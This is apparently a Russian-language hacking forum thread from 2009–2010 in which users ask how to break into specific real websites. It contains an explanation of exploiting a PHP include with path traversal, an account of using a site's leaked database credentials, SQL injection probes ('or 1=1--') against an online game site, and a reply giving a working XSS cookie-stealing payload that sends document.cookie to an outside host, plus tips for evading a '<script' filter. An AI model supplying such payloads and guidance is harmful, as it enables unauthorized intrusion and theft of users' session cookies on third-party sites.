
24.12.2009, 15:44
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
|
|
|

24.12.2009, 15:47
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
|
|
|

31.12.2009, 04:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
|
|
|

31.12.2009, 08:55
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от Nightmarе
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
то что порт открыт - не значит, что тебе туда можно
|
|
|

24.12.2009, 15:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
php-include
При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
читалка файлов
Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

09.01.2010, 18:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
|
|
|

09.01.2010, 19:05
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Nightmarе
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
|
|
|

09.01.2010, 20:15
|
|
Новичок
Регистрация: 18.07.2008
Сообщений: 12
С нами:
9376826
Репутация:
3
|
|
Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.
выглядит так: Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.
Примерно так:
Status On
Name Fate
Class Fairy Elf
Level 1
Resets 0
PK Level Default
Map Devias
Strenght 22
Agility 25
Vitality 10
Energy 15
[code]/reset?char=Fate'[code] выводит ошибку БД соответсвенно,
та же ошибка та же в регестрации в поле e-mail.
Код:
char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1--
дает вывод
Status
Name darkknight
Class Dark Knight
Level 1
Resets 0
PK Level Default
Map Lorencia
Strenght 18
Agility 18
Vitality 15
Energy 30
Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.
Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.
Последний раз редактировалось Cry Wolf; 09.01.2010 в 20:17..
|
|
|

10.01.2010, 06:24
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от .:[melkiy]:.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?
Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.
Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
|
|
|

24.12.2009, 16:00
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
поищу прям ща))) и все-таки?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|